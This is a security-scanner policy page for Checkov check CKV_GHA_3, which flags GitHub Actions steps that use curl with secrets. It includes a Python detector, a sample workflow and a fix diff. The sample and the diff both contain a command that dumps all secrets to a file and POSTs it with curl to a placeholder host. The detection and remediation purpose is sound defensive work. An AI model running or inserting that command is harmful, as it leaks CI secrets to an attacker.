Suspicious use of curl with secrets

Error: Curl is being used with secrets
Bridgecrew Policy ID: BC_REPO_GITHUB_ACTION_3
Checkov Check ID: CKV_GHA_3
Severity: LOW

Curl is being used with secrets

If a workflow has access to a secret and a bad actor can modify the GitHub Action, they can use curl to send the secret to a website they own.
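
A simplified, line-based version of this kind of check, as an added example (not Checkov's implementation of CKV_GHA_3): it flags any run step that both invokes curl and expands a secrets expression, even when the two sit on different lines of the same step. The function names, the sample workflow and the example.com / example.invalid URLs are constructed for illustration.

```python
import re

RUN_KEY = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")
CURL = re.compile(r"\bcurl\b")
SECRETS_EXPR = re.compile(r"\$\{\{[^}]*\bsecrets\b[^}]*\}\}")

# Constructed sample workflow; the URLs are placeholders, not real endpoints.
SAMPLE_WORKFLOW = """\
jobs:
  test:
    steps:
      - name: fetch notes
        run: curl -s https://example.com/notes.txt
      - name: dump
        run: |
          echo "${{ toJSON(secrets) }}" > .secrets
          curl -X POST -s --data "@.secrets" https://example.invalid/c > /dev/null
      - name: deploy
        env:
          TOKEN: ${{ secrets.DEPLOY_TOKEN }}
        run: ./deploy.sh
"""

def run_blocks(text):
    """Yield (1-based line number, script body) for every `run:` step."""
    lines, i = text.splitlines(), 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        i += 1
        if not m:
            continue
        start, indent, inline = i, len(m.group(1)), m.group(2)
        body = [inline]
        if inline[:1] in ("|", ">"):  # block scalar: collect the more-indented lines
            body = []
            while i < len(lines) and (not lines[i].strip() or
                    len(lines[i]) - len(lines[i].lstrip()) > indent):
                body.append(lines[i].strip())
                i += 1
        yield start, "\n".join(body)

def find_curl_with_secrets(text):
    """Return line numbers of run steps that call curl and expand a secret."""
    return [n for n, body in run_blocks(text)
            if CURL.search(body) and SECRETS_EXPR.search(body)]

if __name__ == "__main__":
    for n in find_curl_with_secrets(SAMPLE_WORKFLOW):
        print(f"line {n}: run step uses curl together with a secrets expression")
```

Treat a hit as a prompt for manual review: a legitimate API call that passes a token to curl matches as well.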

Example Fix

Block and remove code that attempts to exfiltrate secrets.

       run:  |
-         echo "${{ toJSON(secrets) }}" > .secrets
-         curl -X POST -s --data "@.secrets" <BADURL > /dev/null
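
Review bot: with both `-` lines removed, the `run: |` key shown above them is left with no commands, so the step itself should be deleted rather than only its body. Because the removed lines wrote `toJSON(secrets)` to `.secrets` and posted that file, the fix should also say to rotate every secret the workflow could read.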
